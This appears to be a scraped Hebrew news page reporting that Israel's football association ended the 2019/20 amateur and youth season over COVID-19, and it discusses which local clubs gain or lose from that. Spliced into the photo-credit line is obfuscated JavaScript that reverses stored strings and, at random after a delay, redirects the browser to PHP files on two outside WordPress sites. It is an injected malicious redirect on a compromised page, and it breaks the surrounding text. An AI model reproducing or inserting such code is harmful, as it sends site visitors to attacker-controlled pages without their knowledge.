fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

הסתיימה עונת הכדורגל בליגות הנמוכות והנוער. מי הרוויחה? מי הפסידה?

הנהלת ההתאחדות לכדורגל הודיעה על סיום עונת 2019/20 בליגות החובבניות - בוגרים, נשים, נוער, נערים, נערות וילדים וילדות לנוכח משבר הקורונה וחוסר הוודאות באשר לחידוש אפשרי של המשחקים
צילום: shutterstock
צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

הסתיימה עונת הכדורגל בליגות הנמוכות והנוער. הנהלת ההתאחדות לכדורגל הודיעה אתמול, שני, על סיום עונת 2019/20 בליגות החובבניות – בוגרים, נשים, נוער, נערים, נערות, ילדים וילדות – לנוכח משבר הקורונה וחוסר הוודאות באשר לחידוש אפשרי של המשחקים.

לפי התקנון שפירסמה ההתאחדות הקבוצות שהיו מתחת לקו האדום והיו אמורות לרדת ליגה יישארו בליגה. בעצם, כך הן "ייהנו" מהמצב שנוצר בעקבות משבר הקורונה.

קבוצה שממש יכולה להרגיש הקלה, בעקבות החלטת ההתאחדות, היא מכבי קרית אתא שניצלה מירידה, אחרי עונה שהייתה שקועה מתחת לקו האדום וכלל לא בטוח שהייתה מצליחה לשרוד.

לפי התקנון, העולות ליגה הן הקבוצות עם אחוזי ההצלחה הגבוהים ביותר, ולאו דווקא הקבוצה שבמקום הראשון.

הנפגעת העיקרית כתוצאה מהחלטת ההתאחדות היא היא הפועל קרית ים מליגה ג' שהייתה במיקום שמוביל למשחקי הפלייאוף ועלייה לליגה', ב אך כתוצאה מההחלטה הפלייאוף יבוטל העונה.

יו"ר ההתאחדות אורן חסון אמר: "השאיפה שלנו הייתה ונותרה לעשות הכל, כדי שהעונה הנוכחית תסתיים על כר הדשא. אלא שהשיחות הרבות שקיימנו עם ראשי משרד הבריאות, ראשי הרשויות וכמובן נציגים רבים של הקבוצות, חייבו קבלת החלטה בשלב הזה במטרה לייצר ודאות והפניית משאבים להתמודדות לקראת העונה הבאה".

לגביי הליגות הבכירות, אמר חסון: "לאחר יותר מחודש שבו לא נערכו אימונים, יהיה זה נאיבי לדבר על אפשרות לחדש את הליגות", אמר, "המידע שניתן לנו על ידי גורמים מוסמכים הוא כי הספורט הקבוצתי יהיה בין האחרונים לחזור לשגרה (במקרה האופטימי מדובר על חודש יוני)".

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות